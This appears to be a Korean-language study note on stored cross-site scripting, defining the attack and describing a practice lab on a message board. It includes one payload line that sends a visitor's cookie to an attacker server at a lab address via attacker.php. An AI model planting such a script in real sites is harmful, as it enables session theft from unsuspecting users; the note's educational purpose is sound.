XSS

* Stored XSS

→ 공격자가 게시판등에 악의적인 스크립트를 저장해두고 사용자가 해당 게시판을 클릭 할 경우 해당 스크립트가 실행돼서 악의적인 행위가 클라이언트 측에서 발생하는 공격

(<script>document.location="http://192.168.56.2/attacker.php?cookie="+document.cookie;</script>) 처럼

게시판 글 클릭 시 사용자의 쿠키 값을 쿼리스트링으로 담아 공격자의 서버(192.168.56.2의 attacker.php 파일)로 전달할 수 있음.

 

* Stored XSS 실습

→ 게시판에 악의적인 스크립트을 저장해서 게시글에 접근 시 사용자 측에서 악의적인 행위가 발생할 수 있는지( 사용자 측에서 스크립트가 실행되는지) 알아보기 위해 사용자의 쿠키값을 출력하는 스크립트를 작성 후 저장

 

→ 저장된 게시글을 클릭할 경우 스크립트가 사용자 측에서 실행되어 사용자 쿠키값이 출력되는 모습임.

 

→ 스크립트가 동작한 페이지의 페이지 소스 보기를 해보면 처음에 저장했던 스크립트가 저장되어 실행된다는 사실을 알 수 있음.

 

 

※ 현재는 게시판에 스크립트가 저장되어 사용자가 게시물에 접근시 사용자 측에서 악의적인 행위가 발생할 수 있는지 여부만 확인해본것이고 실제로는 클라이언트의 쿠키값을 담아 공격자 측으로 전달하는 등의 행위를 하도록 설계한다.